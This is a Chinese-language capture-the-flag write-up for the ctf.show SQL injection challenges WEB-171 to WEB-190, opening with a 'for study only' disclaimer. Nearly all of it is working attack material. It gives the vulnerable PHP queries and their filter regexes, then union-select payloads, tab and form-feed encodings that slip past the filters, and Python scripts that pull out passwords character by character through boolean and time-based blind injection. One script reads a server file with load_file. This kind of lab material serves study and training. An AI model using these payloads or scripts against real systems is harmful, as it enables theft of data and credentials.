仅供学习参考,禁止用于其他非法途径
WEB-171
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";payload:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
1' union select id,username,password from ctfshow_user --+WEB-172
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
$ret['msg']='查询成功';
}payload:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+
1' union select hex(username),password from ctfshow_user2 --+WEB-173
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}payload:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user3' --+
1' union select hex(id),hex(username),hex(password) from ctfshow_user3 --+WEB-174
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}payload:
import requests
url = "http://43fcdabd-c874-4eff-aba9-7f5a39e7d3d0.challenge.ctf.show/api/v4.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
for i in range(1,46):
for j in dirt:
#payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user4"'
payload = 'password from ctfshow_user4 where username="flag"'
payload = '''1' and substr((select {}),{},1)="{}"--+'''.format(payload,i,j)
payload = url + payload
print(payload + flag)
res = requests.get(payload)
if 'admin' in res.text:
flag += j
print(flag)
breakWEB-175
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}payload:
import requests
import time
url = "http://ec5964c7-abfc-4994-b944-4cdc22fe9cfa.challenge.ctf.show/api/v5.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
for i in range(1,46):
for j in dirt:
a = time.time()
#payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user5"'
payload = 'password from ctfshow_user5 where username="flag"'
payload = '''1' and if(substr((select {}),{},1)="{}",sleep(3),0)--+'''.format(payload,i,j)
payload = url + payload
print(payload + flag)
res = requests.get(payload)
b = time.time()
if (b - a) >= 2.5:
flag += j
print(flag)
breakWEB-176
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}payload:
1' or 1=1 --+WEB-177
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}过滤了空格
payload:
1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23WEB-178
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
} payload:
1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23WEB-179
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}过滤了空格,%09
payload:
1'%0cunion%0cselect%0c1,2,group_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()%0c%23
1'%0cunion%0cselect%0c1,2,group_concat(column_name)%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_name='ctfshow_user'%0c%23
1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%0c%23WEB-180
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1WEB-181
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1WEB-182
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
}payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1WEB-183
//拼接sql语句查找指定ID用户
$sql = "select count(pass) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}
//返回用户表的记录总数
$user_count = 0;payload:
import requests
s = requests.session()
url = "http://601333f9-6b46-44b1-9696-99b072b8d352.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
for i in range(8,46):
for j in dirt:
data['tableName'] = "(ctfshow_user)where(left(pass,{}))like'{}'".format(i,flag + j)
res = requests.post(url,data=data)
print(j)
if '$user_count = 1;' in res.text:
flag += j
print(flag)
breakWEB-184
//拼接sql语句查找指定ID用户
$sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
//返回用户表的记录总数
$user_count = 0;payload:
import requests
s = requests.session()
url = "http://2f26a0e7-8a44-47b8-bbe7-6d1aa82aa558.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
for i in range(9,46):
for j in dirt:
k = ord(j)
data['tableName'] = "ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{},1)regexp(char({})))".format(i,k)
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
breakWEB-185
//拼接sql语句查找指定ID用户
$sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
//返回用户表的记录总数
$user_count = 0;payload:
import requests
s = requests.session()
url = "http://cf339e07-f61c-429a-95ed-e6c0eb4f34fd.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
def true(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n-1):
num+='+true'
return num
for i in range(9,46):
for j in dirt:
k = ord(j)
data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
break WEB-186
//拼接sql语句查找指定ID用户
$sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
//返回用户表的记录总数
$user_count = 0; payload:
import requests
s = requests.session()
url = "http://aa84b762-1ddb-4b0a-926c-6c2aa357ee60.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
def true(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n-1):
num+='+true'
return num
for i in range(9,46):
for j in dirt:
k = ord(j)
data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
breakWEB-187
//拼接sql语句查找指定ID用户
$sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
$username = $_POST['username'];
$password = md5($_POST['password'],true);
//只有admin可以获得flag
if($username!='admin'){
$ret['msg']='用户名不存在';
die(json_encode($ret));
}payload:
用户:admin 密码:ffifdyopWEB-188
//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username}";
//用户名检测
if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
//密码检测
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
//密码判断
if($row['pass']==intval($password)){
$ret['msg']='登陆成功';
array_push($ret['data'], array('flag'=>$flag));
}payload:
用户:0 密码:0WEB-189
//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username}";
//用户名检测
if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
//密码检测
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
//密码判断
if($row['pass']==$password){
$ret['msg']='登陆成功';
}payload:
import requests
url = 'http://e32b038a-f47c-4fd9-bede-e7ebae1e0506.challenge.ctf.show/api/'
data = {'username':'','password':123}
def getIndex():
start = 1
tail = 300
mid = (start + tail) //2
while start < tail:
mid = (start + tail) //2
data['username'] = "if(locate('ctfshow',load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid))
res = requests.post(url,data=data)
if "密码错误" in res.json()['msg']:
start = mid + 1
else:
tail = mid
return mid
def getFlag(num):
flag = ''
for i in range(int(num)+1,int(num)+46):
for j in r'1234567890qazwsxedcrfvtgbyhnujmiklop':
data['username'] = 'if(ascii(substr(load_file("/var/www/html/api/index.php"),%d,1))!=%d,0,1)' % (i, ord(j))
res = requests.post(url,data=data)
if "密码错误" != res.json()['msg']:
flag += j
print(flag)
break
getFlag(getIndex())WEB-190
//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = '{$username}'";
//密码检测
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
//密码判断
if($row['pass']==$password){
$ret['msg']='登陆成功';
}
//TODO:感觉少了个啥,奇怪payload:
import requests
url = 'http://5a06a32e-8ee9-4c40-bbb7-de12a6c92342.challenge.ctf.show/api/'
data = {'username':'','password':123}
flag = ''
for i in range(1,46):
first = 32
tail = 127
while first < tail:
mid = (first + tail) // 2
data['username'] = f"admin' and if(ascii(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
res = requests.post(url,data=data)
if '密码错误' in res.json()['msg']:
first = mid + 1
else:
tail = mid
flag = flag + chr(first)
print(flag)
